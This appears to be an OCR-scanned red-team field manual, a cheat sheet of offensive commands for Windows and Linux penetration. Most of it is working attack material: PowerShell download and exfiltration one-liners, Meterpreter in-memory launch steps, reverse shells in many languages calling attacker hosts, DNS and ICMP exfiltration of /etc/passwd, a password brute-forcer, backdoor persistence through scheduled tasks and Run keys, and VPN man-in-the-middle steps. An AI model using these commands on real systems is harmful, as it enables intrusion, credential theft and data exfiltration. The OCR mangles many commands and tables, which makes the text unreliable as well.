LIST HOSTNAME AND IP FOR ALL DOMAIN COMPUTERS 


Get-WmiObject -ComputerName DC  -Namespace root\microsoftDNS -Class 
MicrosoftDNS ResourceRecord -Filter "domainname=' DOMAIN '" |select 
textrepresentation 


POWERSHELL DOWNLOAD OF A FILE FROM A SPECIFIED LOCATION 


powershell.exe -noprofile -noninteractive -command 
"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = 
[$true]; $source-" "https:// YOUR SPECIFIED. IP / file.zip."""; 
Sdestination="""C:`master.zip"""; Shttp = new-object System.Net.WebClient; 
Sresponse = $http.DovnloadFile($source, Sdestination);" 


POWERSHELL DATA EXFIL 


Script will send a file (Sfilepath) via http to server ($server) via POST 
request. Must have web server listening on port designated in the Sserver 


powershell.exe -noprofile -noninteractive -command 
"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = 
true server” ""hDtEpcAJ YOUR: SPECTETED: TE Folden", 
Sfilepath="""C:\master.zip"""; $http = new-object System.Net.WebClient; 
Sresponse = Shttp.UploadFile($server, $filepath);" 
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USING POWERSHELL TO LAUNCH METERPRETER FROM MEMORY 


v Need Metasploit v4.5+ (msfvenom supports Powershell) 
v Use Powershell (x86) with 32 bit Meterpreter payloads 
v encodeMeterpreter.psl script can be found on next page 


ON ATTACK BOXES 


I ./msfvenom -p windows/meterpreter/reverse https -f psh -a x86 
LHOST=1.1.1.1 LPORT=443 audit.psl 

2. Move audit.psl into same folder as encodeMeterpreter.psl 

s Launch Powershell (x86) 

4. powershell.exe -executionpolicy bypass encodeMeterpreter.psl 

S Copy the encoded Meterpreter string 


START LISTENER ON ATTACK BOX 


./msfconsole 

use exploit/multi/handler 

set payload windows/meterpreter/reverse https 
set LHOST 1.1.1.1 

set LPORT 443 

exprfort 7 


O) Ol ve C) F2 HƏ 


ON TARGET (MUST USE POWERSHELL (X86)) 


ké powershell.exe -noexit -encodedCommand paste encoded Meterpreter 
string here 
PROFIT 


ENCODEMETERPRETER.PS1 [7] 


# Get Contents of Script 
Scontents = Get-Content audit.psl 


# Compress Script 

Sms = New-Object IO.MemoryStream 

Saction = [IO.Compression.CompressionMode] : : Compress 

$cs = New-Object 10.Compression.DeflateStream ($ms, Saction) 
$sw = New-Object IO.StreamWriter ($cs, [Text.Encoding] ::ASCII) 
Scontents | ForEach-Object (Ssw.WriteLine($ )) 

Ssw.Close() 


# Base64 Encode Stream 

Scode = [Convert] ::ToBase64String($ms.ToArray()) 

Scommand = "Invoke-Expression '$ (New-Object 10.StreamReader( $ (New-Object 
IO.Compression.DeflateStream (`$(New-Object IO.MemoryStream 

(, S([Convert]::FromBase64String( "Scode ")))), 
[IO.Compression.CompressionMode]::Decompress)), 
[Text.Encoding] : : ASCIT))..ReadToEnd();" 


# Invoke-Expression $command 
Sbytes = [System.Text.Encoding] : :Unicode.GetBytes ($command) 
SencodedCommand = [Convert] ::ToBase64String (Sbytes) 


# Write to Standard Out 
Write-Host $encodedCommand 


Copyright 2012 TrustedSec, LLC. All rights reserved. 
Please see reference [7] for disclaimer 
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USING POWERSHELL TO LAUNCH METERPRETER (2 METHOD) 


ON BT ATTACK BOX 


1.  msfpayload windows/meterpreter/reverse tcp LHOST-10.1.1.1 
LPORT=8080 R | msfencode -t psh -a x86 


ON WINDOWS ATTACK BOX 


1. e:\ powershell 

2. PS c:\ $cmd = " PASTE THE CONTENTS OF THE PSH SCRIPT HERE ' 
3s PS c:\ Su = [System.Text.Encoding]::Unicode.GetBytes (Scmd) 
4. PS c:\ Se = [Convert]::ToBase64String(Su) 

52. PE 60 nè 

B 


Copy contents of Se 


START LISTENER ON ATTACK BOX 


./msfconsole 

use exploit/multi/handler 

set payload windows/meterpreter/reverse tcp 
set LHOST- T.1.1.1 

set LPORT 8080 

exploit -j 


O) O 4 (9 (O kr 


ON TARGET SHELL (l: DOVNLOAD SHELLCODE, 2: EXECUTE) 


l. c:N powershell -noprofile -noninteractive -command "& 
(Sclient-new-object 
System.Net.WebClient;Sclient.DownloadE)le('http:t//l.1.1.17/8heLl.txt 
— QrNWindowsVbempN shellibzEt)g" 

2. c:N powershell -noprofile -noninteractive -noexit -command "a 
($cmdetype 'c:NwindowsNtempN shell.txt';powershell -noprofile - 
noninteractive -noexit -encodedCommand Scmd)" 

PROFIT 
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WINDOWS REGISTRY 


OS INFORMATION 


HKLM\Software\Microsoft\Windows NT `CurrentVersion 


PRODUCT NAME 


HKLM\Software\Microsoft\Windows NT\CurrentVersion /v 
ProductName 


DATE OF INSTALL 


HKLM\Software\Microsoft\Windows NT\CurrentVersion /v InstallDate 


REGISTERED OWNER 


HKLM\Software\Microsoft\Windows NT\CurrentVersion /v RegisteredOwner 


SYSTEM ROOT 


HKLM\Software\Microsoft\Windows NT\CurrentVersion /v SystemRoot 


TIME ZONE (OFFSET IN MINUTES FROM UTC) 


HKLM\System\CurrentControlSet\Control\TimeZonelnformation /v ActiveTimeBias 


MAPPED NETWORK DRIVES 


HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive 
MRU 


MOUNTED DEVICES 


HKLM\System\MountedDevices 


USB DEVICES 


HKLM\System\CurrentControlSet\Enum\USBStor 


TURN ON IP FORWARDING 


HKEY LOCAL _MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters - 
IPEnableRouter = 1 


PASSWORD KEYS: LSA SECRETS CAN CONTAIN VPN, AUTOLOGON, OTHER 
PASSWORDS 


HKEY_LOCAL_MACHINE\Security\Policy\Secrets 
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\autoadminlogon 


AUDIT POLICY 


HKLM\Secturity\Policy\PolAdTev 
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KERNEL/USER SERVICES 


HKLM\Software\Microsoft\Windows NT\CurrentControlSet\Services 


INSTALLED SOFTWARE ON MACHINE 


HKLM\Software 


INSTALLED SOFTWARE FOR USER 


HKCU\Software 


RECENT DOCUMENTS 


HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs 


RECENT USER LOCATIONS 


HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisite 
dMRU & NOpenSaveMRU 


TYPED URLS 


HKCU\Software\Microsoft\Internet Explorer\TypedURLs 


MRU LISTS 


HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU 


LAST REGISTRY KEY ACCESSED 


HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\RegEdit /v LastKey 


STARTUP LOCATIONS 


HKLM\Software\Microsoft\Windows\CurrentVersion\Run & \Runonce 
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 
HKCU\Software\Microsoft\Windows\CurrentVersion\Run & \Runonce 
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load & \Run 


ENUMERATING WINDOWS DOMAIN WITH DSQUERY 


LIST USERS ON DOMAIN WITH NO LIMIT ON RESULTS 


dsquery user -limit O 


LIST GROUPS FOR DOMAIN=VICTIM. COM 


dsquery group "cn=users, dc-victim, dc-com" 


LIST DoMAIN ADMIN ACCOUNTS 


dsquery group -name "domain admins"| dsget group -members -expand 


LIST ALL GROUPS FOR A USER 


dsquery user -name bob' | dsget user -memberof -expand 


GET A USER'S LOGIN ID 


dsquery user -name bob^ | dsget user -samid 


LIST ACCOUNTS INACTIVE FOR 2 WEEKS 


dsquery user -inactive 2 


ADD DOMAIN USER 


dsadd user "CN=Bob,CN=Users, DC=victim, DC=com" -samid bob -pwd bobpass - 
display "Bob" -pwdneverexpires yes -memberof "CN-Domain 
Admins, CN=Users, DC=victim, DC=com 


DELETE USER 


dsrm -subtree -noprompt "CN=Bob, CN=Users, DC=victim, DC=com" 


LIST ALL OPERATING SYSTEMS ON DOMAIN 


dsquery * "DC=victim, DC=com" -scope subtree -attr "cn" "operatingSystem" 
"operatingSystemServicePack" -filter 
"(&(objectclass-computer) (objectcategory=computer) (operatingSystem-Windows" 


.. 


LIST ALL SITE NAMES 


dsquery site -o rdn -limit 0 


LIST ALL SUBNETS WITHIN A SITE 


dsquery subnet -site sitename -o rdn 


LIST ALL SERVERS WITHIN A SITE 


dsquery server -site sitename -o rdn 
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FIND SERVERS IN THE DOMAIN 


dsquery “ domainroot -filter 
"(&(objectCategory-Computer) (objectClass=Computer) (operatingSystem="Server* 
pr “SIME: 


DOMAIN CONTROLLERS PER SITE 


dsquery ' "CN=Sites,CN=Configuration, DC=forestRootDomain" -filter 
(objectCategory=Server) 
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WINDOWS SCRIPTING 


^ If scripting in batch file, variables must be preceeded with $$, i.e. %%i 


NESTED FOR LOOP PING SWEEP 


for Lh Lin (210421,254) do. 8 ATor TE, 38-110 (10,12,254). do 8 ping - 1 ww 100 
10.10.%i.%x 2 nul | find "Reply" 66 echo 10.10.%1.%x Jiye, EE 


LOOP THROUGH FILE 


for /F %i in ( file ) do command 


DOMAIN BRUTE FORCER 
for /F $n in (names.txt) do for /F %p in (pawds.txt) do net use NADCOIN`IPCS 


/user: domain $n %p 1 NUL 2 61 && echo $n:$p && net use /delete 
NNDCOLNIPGS . “NUL 


ACCOUNT LOCKOUT (LOCKOUT. BAT) 
@echo Test run: 


for Jf $9U in (llst.txt) do 8fòor. /1 $5C in (1,1,5) do (echo nèt use XNİN- 
1234\c$ /USER:$$U wrongpass 


DHCP EXHAUSTION 


for /L %i in (2,1,254) do (netsh interface ip set address local static 
1.1.1.6i netmask gw TE 2. pine 10005041 Siy (ə 10000 nul $1) 


DNS REVERSE LOOKUP 


for AL €i in (100, l, 1058) dè & rislòéokup.l..k.ls8r. | findstr fi. yc: "Name" 
dns.txt && echo Server: 1.1.1.%i dns.txt 


SEARCH FOR FILES BEGINNING WITH THE WORD "PASS" AND THEN PRINT IF 
IT'S A DIRECTORY, FILE DATE/TIME, RELATIVE PATH, ACTUAL PATH AND 
SIZE (ÜVARIABLES ARE OPTIONAL) 


forfiles /P c:\temp /s /m pass” -c "cmd /c echo GBisdir Gfdate Gftime 
@relpath Gpath @fsize" 


SIMULATE MALICIOUS DOMAIN CALLOUTS (USEFUL FOR AV/IDS TESTING) 


# Run packet capture on attack domain to receive callout 
# domains.txt should contain known malicious domains 


for AL #1 in (0,1 100) :de- (for ZE SA in (domaıns.ext) do nslookup n 
attack domain NUL 2 b ping nm 5 127:0.0.1 NUL 2 &1 


IE WEB LOOPER (TRAFFIC GENERATOR) 


for /L %C in (1,1,5000) do Gfor %U in (www.yahoo.com www.pastebin.com 
www. paypal.com www.craigslist.org www.google.com) do start /b iexplore SU & 
ping -n 6 localhost 6 taskkill /F /IM iexplore.exe 
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GET PERMISSIONS ON SERVICE EXECUTABLES 
for /f "tokens=2 delims='='" $a in ('wmic service list full |find /i 
"pathname" |find /i /v "system32"') do @echo $a 


c:Nwindows`temp`3afd4ga.tmp 


for /f eol = " delims = " %a in (c:\windows\temp\3afd4ga.tmp) do cmd.exe 
/aoıcac€ığ "a" 


ROLLING REBOOT (REPLACE /R WITH /S FOR A SHUTDOWN): 


for /L $3 Xm 12514254 do shutdown /r JM DILL. SL 7f FED 7o "Reboot 
message" 


SHELL ESCALATION USING VBS (NEED ELEVATED CREDENTIALS) 


# Create .vbs script with the following 


Set shell ' wscript.createobject("wscript.shell") 

Shell.run "runas /user: user " & """" & 
C:\Windows\System32\WindowsPowershell\vl.O\powershell.exe -WindowStyle 
hidden -NoLogo -NonInteractive -ep bypass -nop -c \" & """" & "IEX ( (New- 
Object Net;WEbClient).dowuloadstring( url AN GMN GREN 


wscript.sleep (100) 
shell.Sendkeys " password " & "(ENTER)" 


50: 


TASK SCHEDULER 


^ Scheduled tasks binary paths CANNOT contain spaces because everything 
after the first space in the path is considered to be a command-line 
argument. Enclose the /TR path parameter between backslash (N) AND 
quotation marks ("): 


. /TR "\"C:\Program Files\file.exe\" -x argl" 


TASK SCHEDULER (ST=START TIME, SD=START DATE, ED=END DATE) 
“MUST BE ADMIN 


SCHTASKS /CREATE /TN Task Name /SC HOURLY /ST HH:MM /F /RL HIGHEST /SD 
MM/DD/YYYY /ED MM/DD/YYYY /tr "C:\my.exe" /RU DOMAIN\user /RP 
password 


TASK SCHEDULER PERSISTENCE [10] 


"For 64 bit use: 
"C:\Windows\syswow64\WindowsPowerShell\vl1.O\powershell.exe" 


# (x86) on User Login 

SCHTASKS /CREATE /TN Task Name /TR 
"C:NWindowsNSystem32NWindowsPowerShellNvl.ONpowershell.exe -WindowStyle 
hidden -NoLogo -NonInteractive -ep bypass -nop -c “IEX ((new-object 
net.webclient).downloadstring( "http:// ip? port. f payload ”””))37” /S0 
onlogon /RU System 


# (x86) on System Start 

SCHTASKS /CREATE /TN Task Name /TR 
"C:NWindows`System32`WindowsPowerShell`v1.ONpowershell.exe -WindowStyle 
hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object 
net.webclient).downloadstring( 'http:// ip : port / payload '''))'" /SC 
onstart /RU System 


* (x86) on User Idle (30 Minutes) 

SCHTASKS /CREATE /TN Task Name /TR 
"C:NWindowsNSystem32NWindowsPowerShellNvl.ONpowershell.exe -WindowStyle 
hidden -NoLogo -NonInteractive -ep bypass -nop -c “IEX ((new-object 
net.webclient).downloadstring( 'http:// ip : port / payload '''))'" /SC 
onidle /i 30 


da 
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NETWORKING 


Windows 
Linux 

Network 
Solaris 


FTP 

SSH 
Telnet 
SMTP 
TACACS 
DNS 

DHCP (UDP) 
TFTP (UDP) 
HTTP 
Kerberos 
POP3 

RPC 

NTP (UDP) 
windows RPC 
NetBIOS 
NetBIOS 
SMB 

IMAP 

SNMP (UDP) 
BGP 
AppleTalk 
LDAP 
HTTPS 

SMB 
ISAKMP (UDP) 
Syslog 


128 
64 

255 
255 


COMMON PORTS 


520 
546/7 
557 
902 
1080 
1194 
1433/4 
1924 
1629 
2049 
3128 
3306 
3389 
5060 
5222 
5432 
5666 
5900 
6000 
6129 
666° 
9001 
ST 
9090/1 
9100 


RIP 

DHCPv6 
SMTP 
VMWare 
Socks Proxy 
VPN 
MS-SQL 
Oracle 
DameWare 
NFS 

Squid Proxy 
MySQL 

RDP 

SIP 

Jabber 
Postgres 
Nagios 

VNC 

x11 
DameWare 
IRC 

Tor 

HSQL 
Openfire 
Jet Direct 


TTL FINGERPRINTING 
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IPv4 


CLASSFUL IP RANGES 


A 0.0.0.0 ="121/2554255/255 
B 128000 191 255.258 3230 
e KOL uq AZI Te 25590255 
D 224.000 239.255. 29592295 
E 24005050: 255.255 205055 


RESERVED RANGES 


L0.0.020 == UD IZ. 25d. 

ECC ON OS = 127,295,2592255 

1 E Jd Uc. 100100” 

192. 16800 = 779222684235 ,255 
SUBNETTING 

POU 20942994, 2005204 1 Host 

/30 25500255. 2582252 (ZHosts 

/29 205529942004 248 6 Hosts 

/28 255:255.255220 14 «Host 5 

TA 255,255:255.224 501955 

26 255:255:255.192 “62 HOSES 

yz 255.255.25252120. 126 HOoSLts 

/24 295.259.2550 254 Hosts 
Jd 255.255 254 D 510 Hosts 

y 22 255. 255.2520 1022 Hosts 
/21 2994500120890 2046 Hosts 

/ 20 25545255, Tq 4094 Hosts 
/19 255. 255. 224.0 8190 Hosts 
/18 200:200.10 0 16382 Hosts 
Al 255 2054 1428.0 32766 Hosts 
/16 255255050 65534 Hosts 
ya 255.254:0.0 131070 Hosts 
/14 200.252V020 262142 Hosts 
FS 255.2458.20v0 524286 Hosts 
Jd ES. 210.050 1048574 Hosts 
Fa 2000722400 2097150 Hosts 
#19 295, 1.92 0.,,0 4194302 Hosts 
/9 255. 128,09: D 8388606 Hosts 
/8 255000 16777214 Hosts 


CALCULATING SUBNET RANGE 

Given: 1.1.1.101/28 

v 128 255.255.255. 245. netmask 

v 256 - 240 = 16 = subnet ranges of 16, i.e. 
hə 
Tə 
eb. 


YO Range where given IP falls: 1.1.1.96 - 1.1.1.111 
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IPv6 


BROADCAST ADDRESSES 


IfOZ:41.-—. lınk-local nodes 
ffOUbccl > SITE 16041 nodes 
ff01::2 - node-local routers 
ff02::2 - link-local routers 
ff05::2 - site-local routers 


INTERFACE ADDRESSES 


fe80:: - link-local 
20012:  routable 


::a.b.c.d - IPv4 compatible IPv6 
PEIIÍIt:ia.D.c.d — IPV4 mapped LPv6 


THC IPv6 TOOLKIT 


Remote Network Dos: 
rsumrf6 eth# remote ipv6 


SOCAT TUNNEL IPv6 THROUGH IPv4 TOOLS 


socat TCP-LISTEN:8080, reuseaddr, fork TCP6: [2001:: 
o^nlebogpd Host 12 0404.21 boru 9080 
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CISCO COMMANDS 


AA 


Enter privilege mode 


-enable 
#configure terminal Configure interface 

(config) #interface fa0/0 Configure FastEthernet 0/0 
(EOnfiG=IE tip add? 114121 -255.255225540 Add IP to fa0/0 

(config) #line vty 0 4 Configure vty line 
(config-line)flogin 1. Set telnet password 
(configrline) #password password 2. Set telnet password 
#show session Open sessions 

#show version IOS version 

#dir file systems Available files 

#dir all-filesystems File information 

#dir /all Deleted files 

#show running-config Config loaded in mem 

#show startup-config Config loaded at boot 

#show ip interface brief Interfaces 

#show interface eO Detailed interface info 
#show ip route Routes 

#show access-lists Access lists 

#terminal length O0 No limit on output 

copy running-config startup-config Replace run w/ start config 
#copy running-config tftp Copy run Sonfig to TETP-Svr 


C1sco IOS 11.2-12.2 VULNERABILITY 


http:// ip /level/ 16-99 /exec/show/config 


SNMP 


MUST START TFTP SERVER 15" 


Jenmpolowvpl. -9 OSLO — Flis Spo t UALDARCKOTPIDO GP OUL.LXU 
snmpstrings.txt 


WINDOWS RUNNING SERVICES: 


snmpwalk -c public -vl ip 1 |grep hrSWRunName |cut -d" " -f4 


WINDOWS OPEN TCP PORTS: 


smpwalk s. rep tèplConnState: PVcuğ -d" " —f6.. Sort —ü 


WINDOWS INSTALLED SOFTWARE: 


smpwalk .. |grep hrSWInstalledName 


WINDOWS USERS: 


smmpwalk 4 Ap l. 1qdrep 77:101.2.29 a. 14 
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E 


PACKET CAPTURING 


CAPTURE TCP TRAFFIC ON PORT 22-23 


tcpdump -nvvX -s0 -i ethO0 tcp portrange 22-23 


CAPTURE TRAFFIC TO SPECIFIC IP EXCLUDING SPECIFIC SUBNET 


topdump —I ethü -tttt dst ip “and not net 1.1.1.0724 


CAPTURE TRAFFIC B/W LOCAL-192.1 


tcpdump net 192.1.1 


CAPTURE TRAFFIC FOR <SEC> SECONDS 


dumpcap -I ethO -a duration: sec -w file file.pcap 


REPLAY PCAP 


file2cable -i ethO -f file.pcap 


REPLAY PACKETS (FUZZ İ DoS) 


Ecpreplay ==Lopspeed -=l00p=0 -o—intfi-ethO. ,;peap. File to replay. == 
mbps=10|100|1000 


DNS 


DNSRECON 


Reverse lookup for IP range: 
./dnsrecon.rb -t rvs -i 192.1.1.1,192.1.1.20 


Retrieve standard DNS records: 
./dnsrecon.rb -t std -d domain.com 


Enumerate subdomains: 
./dnsrecon.rb -t brt -d domain.com -w hosts.txt 


DNS zone transfer: 
./dnsrecon -d domain.com -t axfr 


NMAP REVERSE DNS LOOKUP AND OUTPUT PARSER 


nmap -R -sL -Pn -dns-servers  dns svr ip range | awk “(if((S1" "$2" 
"53)=="Nmap scan report")print$5" "$6)” | sed “s/(//9” | sed 's/)//qg' 
dns.txt 
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VPN 


WRITE PSK TO FILE 


lkeescan UA “von dp E tbe 


DoS VPN SERVER 


lke-Scat A cU l1soüurcelrp- spoof Ip. -dSt lp 


FIKED - FAKE VPN SERVER 


v 


Must know the VPN group name and pre-shared key 


Ettercap filter to drop IPSEC traffic (UDP port 500) 


if(ip.proto == UDP && udp.src == 500) { 
RELE 
drop(); 
möəeğl”? SOD Packer droppedos^sAm 


) 

Compile filter 

. etterfilter udpdrop.filter -o udpdrop.ef 
Start Ettercap and drop all IPSEC traffic 
#ettercap -T -q -M arp -F udpdrop.ef // // 
Enable IP Forward 


echo "1" /proc/sys/net/ipv4/ip forward 
Configure IPtables to port forward to Fiked server 

iptables -t nat -A PREROUTING -p udp -I ethO -d VPN Server IP Tə 
DNAT - - to Attacking Host IP 


iptables -P FORWARD ACCEPT 
Start Fiked to impersonate the VPN Server 
fiked - g vpn gateway ip - k VPN Group Name:Group Pre-Shared Key 
Stop Ettercap 
Restart Ettercap vithout the filter 
. ettercap -T -M arp // // 


PuTTY 


REG KEY TO HAVE PUTTY LOG EVERYTHING (INCLUDING CONVERSATIONS) 


(HKEY CURRENT USERN Software`SimonTatham`Putty`Sessions`Default320Settings] 
"LogFileName"-"$TEMP$Nputty.dat" 
"LogType"-dword:00000002" 
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TIPS AND TRICKS 


FILE TRANSFER 


FTP THROUGH NON-INTERACTIVE SHELL 


echo open ip 21 rips 


echo user TLD.UXL 
echo pass Fipytst 
echo bin ftp.txt 

echo GET file ftp.txt 
echo bye BU ERE 


LEPASE 


DNS TRANSFER ON LINUX 


On victim: 


1. Hex encode the file to be transferred 
xxd -p secret file.hex 
2. Read in each line and do a DNS lookup 
for b in "cat file.hex `; do dig $b.shell.evilexample.com; done 


On attacker: 
1. Capture DNS exfil packets 
tcdpump -v /tmp/dns -s0 port 53 and host system.example.com 
2. Cut the exfilled hex from the DNS packet 
tcpdump -r dnsdemo -n | grep shell.evilexample.com | cut -f9 -d" ' 
eut SEL <A" (und received.txt 
3. Reverse the hex encoding 
Bader eb receivedu.txt keys.pgp 


EXFIL COMMAND OUTPUT ON A LINUX MACHINE OVER ICMP 


On victim (never ending 1 liner): 

StringZz cat /etc/passwd | 04 -Ltxi | cub “ce Er edn n | Er =d "Xxn' 3 
counter=0; while (($counter = S(#stringZ)));do ping -s 16 -c I -p 
PiStringZzss5counter:l6] 192. 168,103 10. $5 
counter=$ ((counter+16)) ; done 


On attacker (capture packets to data.dmp and parse): 
tcpdump -ntvvSxs 0 'icmp[0]-28' data. dmp 
grep. 020020 dataranp out dl br TN ÆR eg TND ER ESP 


OPEN MAIL RELAY 


ON Gelnet ss. Kl 25 
HELO x.x.x.x 

MAIL FROM: me@you.com 
RCPT TO: youüyou.com 
DATA 

Thank You. 


quit 
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REVERSE SHELLS [1] [3] [4] 


NETCAT (* START LISTENER ON ATTACK BOX TO CATCH SHELL) 


unc 19,070: 123406 yin, sh Linux reverse shell 
nc 10.0.0.1 1234 -e cmd.exe Windows reverse shell 


NETCAT (SOME VERSIONS DON'T SUPPORT —E OPTION) 


no e Jbrn/sHh 10:0:041 1234 


NETCAT WORK-AROUND WHEN —E OPTION NOT POSSIBLE 


rm /tmp/t;mkfifo tip fyrst Jtmp/fl/bin/sh 1 2 $liné 10:00: 1. 1234 > /tmp/£ 


PERL 


perl -e "use Socket; $i="10.0.0.1"; $pe1234, socket (S,PF_INET, SOCK STREAM, 


getprotobyname("tcp")); if(connect(S,sockaddr in($p,inet aton($i))))( 
open(STDIN,' . 485") Open (STDOUT, ". 45") 7 .openiSTDERR, ";-88") 7 exec("/bin/sh = 
qure dea 


PERL WITHOUT /BIN/SH 
perl -MIO -e "$pefork,exit,if($p),$cenev 


IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN- fdopen($c,r)$-- 
fdopen(Sc, w) ;system$ while ;' 


PERL FOR WINDOWS 


perl -MIO -e "$cenev IO::Socket::INET(PeerAddr," "attackerip: 4444") ; STDIN- 
fdopen($c,r);S$-- fdopen($c,v),system$ while ," 


PYTHON 


python -c "İmport socket,subprocess,os; sesocket.socket(socket.AF INET, 


Socket  SØCK SIREAM); s.connectc("10.0,0.1",1234))]5 os.dupZis,filenot”,007 
os.dup2(s.fileno(),l); os.dup2ís.fileno(),2); 
pesubprocess.call(["/bin/sh","-i"]);' 

BASH 


bash -i .& /dev/tcp/10.0.0.1/98080 0.-&1 


JAVA 
r = Runtime.getRuntime() 
pe r.exec(["/biny/basn","-c","éxec 5 .Jdev/tcp/10.0.0.1/2002;càt 45 | 


while read line; do A$line 2 65 &5; done") as String[]) 
p.waitFor() 


PHP 


php “rz 'Ssocksfsockopen("l0.0.0.1",1234);execi"7bin/sh -3 (63 43 2 $3"); 
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RUBY 


rüby “rsocket -e'f-TCPSocket.open("10.0.0,.1",1234).to i; exec 
sorintf("/bin/snh si. 834.350 2 85a", f,f,t)" 


RuBY WITHOUT /BIN/SH 
by -rsocket se. "exit if 


fork; ceTCPSocket.nev("attackerip","4444")?uhile(cmdec.gets)?10.popen(cmd,"r 
"Mhiliojc.print io.read]end' 


RUBY FOR WINDOWS 
ruby -rsocket -e 


"c=TCPSocket.new("attackerip","4444") ;jwhile(cmd=c.gets);IO.popen (cmd, "r') (| 
io|c.print io.readjend' 


TELNET 


rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 O/tmp/p 
--OR-- 


telnet attackerip 4444 | /bin/bash | telnet attackerip 4445 


XTERM 


xterm- —-dasplay 10.0.02171 
oO Start Listener: Xnest :l 
o Add permission to connect: xhost +victimIP 


Misc 


wget hhtp:// server /backdoor.sh -O- | sh Downloads and runs backdoor.sh 
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PERSISTENCE 


FOR LINUX PERSISTENCE (ON ATTACK BOX) 


crontab -e : set for every 10 min 
959/10 E yok ame up. 777 em Sb bes 


WINDOWS TASK SCHEDULER PERSISTENCE (START TASK SCHEDULER) 


sc config schedule start= auto 
net start schedule 
at 13:30 ""C:Xnc.exe ip 777 -e cmd.exe"" 


WINDOWS PERSISTENT BACKDOOR WITH FIREWALL BYPASS 


1. REG add HKEY CURRENT USER Software`Microsoft'Windows`CurrentVersion`Run 
/v firewall /t REG SZ /d "c:\windows\system32\backdoor.exe" /f 

2, at 19:00 /every:M,T,W,Th,F cmd /c start "SUSERPROFILES`backdoor.exe" 

zə SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR 
"SUSERPROFILESNbackdoor.exe" /ED 12/12/2012 


REMOTE PAYLOAD DEPLOYMENT VIA SMB oR VEBDAV 16) 


Via SMB: 

der From the compromised machine, share the payload folder 
2d Set sharing to “Everyone” 

3. Use psexec or wmic command to remotely execute payload 


Via WebDAV: 
l. Launch Metasploit `webdav file server” module 
2 Set folloving options: 


e. localexe=true 
e localfile= payload 


e localroot= payload directory 
e disablePayloadHandleretrue 
Ja Use psexec or wmic command to remotely execute payload 


psexec \\ remote ip /u domain\compromised user /p password "\\ payload 
ip \test\msf.exe" 


wmic /node: remote ip /user:domain\compromised user //password:password 
process call create "\\ payload ip \test\msf.exe" 
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TUNNELING 


FPIPE — LISTEN ON 1234 AND FORWARD TO PORT 80 on 2.2.2.2 


tprpe.exe LL .1234: r 80 252.222 


SOCKS .EXE — SCAN INTRANET THROUGH SOCKS PROXY 


On redirector (1.1.1.1): 
socks;exe —11.l.1.1 -p 8080 


On attacker: 
Modify /etc/proxychains.conf: 


Comment out: *proxy dns 
Comment out: bsocEsda 127.0.0.1 9050 
Add line: socks4 el 8080 


Scan through socks proxy: 
proxvohalns nmap “PN “vw ST —po22,135,139,4245 2.2.2352 


SOCAT — LISTEN ON 1234 AND FORWARD TO PORT 80 on 2.2.2.2 


socat TCP4:LISTEN:1234 TCP4:2.2.2.2:80 


STUNNEL — SSL ENCAPSULATED NC TUNNEL (WINDOWS & LINUX) [8] 


On attacker (client): 
Modify /stunnel.conf 
client = yes 
[netcat client] 
accept = 5555 
connect = -Listening IP-:4444 


On victim (listening server): 
Modify /stunnel.conf 
client = no 
[netcat server] 
accept = 4444 
connect = ””” 
CS ne lp 7757 


On attacker (client): - 
| nc “AV 127,001 5555 


GOOGLE HACKING 


url 


site: ] search only one ([ 
numrange:[#]...[#] search within a number range 
date:[ #] search within past [#] months 
lq [Der] find pages that tink to [url] 
related: [url] find pages related to [url] 
intitle: [string] find pages with [string] in title 
inurl: [string] find pages with [string] in url 
filetype: [xls] find files that are xls 
phonebook: [name] find phone book listings of [name] 
VIDEO TELECONFERENCING 
POLYCOM 


telnet ip 

#Enter 1 char, get uname:pwd 
http:// ip /getsecure.cgi 
http: //- Ip. /en a rei hin 
http:// ip /a security.htm 
httes// Gp Ja rc.htm 


TANDBERG 


http:// ip /snapctrl.ssi 


SONY WEBCAM 


http:// ip /command/visca-gen.cgi?visca= str. 
8101046202FF : Freeze Camera 
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TOOL SYNTAX 


NMAP 


SCAN TYPES 

-sP : ping scan -sU : udp scan 

—55 2 SYN Scan “SÖ t protocol scan 
-sT : connect scan 

OPTIONS 

—ple6002535- 3 ports -sV : version detection 
-T 10-51 : 0=5m, 1=15s, 2=.4s -PN : no ping 

-n : no dns resolution -6 : IPv6 scan 

-0 : OS detection --randomize-hosts 
-A : aggressive scan 

OUTPUT / INPUT 

-oX . file : write to xml file 

-oG “file. : write to grep file 

-oA file : save as all 3 formats 

-iL file. : read hosts from file 

-excludefile - file : excludes hosts in file 


ADVANCED OPTIONS 


-sV -p# --script=banner SETE å SOR qe 
-traceroute >=S0ript  Søript 


FIREWALL EVASION 


=E : fragment packets ==spoof-mac : mac 
mü : spoof src --data-length size 
-g å : Spoof src port (append random data) 
-D "ip , ip : Decoy --scan-delay 5s 

--mtu # : set MTU size 


CONVERT NMAP XML FILE TO HTML: 


xsltproc nmap.xml -o nmap.htmi 


GENERATE LIVE HOST FILE: 


nmap -sP -n -oX out.xml 1.1.1.0/24 2.2.2.0/24 | grep "Nmap" 
2 we LIVE. Hosts» tet 


| cut -d " " -f 


COMPARE NMAP RESULTS 


ndiff scanl.xml scan2.xml 


DNS REVERSE LOOKUP ON IP RANGE 


nmap -R -sL -dns-server server. 1.1.1.0/24 


IDS TEsT (XMAS SCAN WITH DECOY IPs AND SPOOFING) 


for x in [1..10000..1];do nmap -T5 -sX -8 .spoof-source-IP 


-D .comma- 


seperated with no spaces list of decoy IPs. --spoof-mac aa:bb:cc:dd:ee:ff - 


e ethO -Pn targeted-IP ; done 
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WIRESHARK 


eth.addr/eth.dst.eth.src MAC 

rip.auth.passwd RIP password 
ip.addr/ip.dsSst/lp.src (ipv6-) IP 
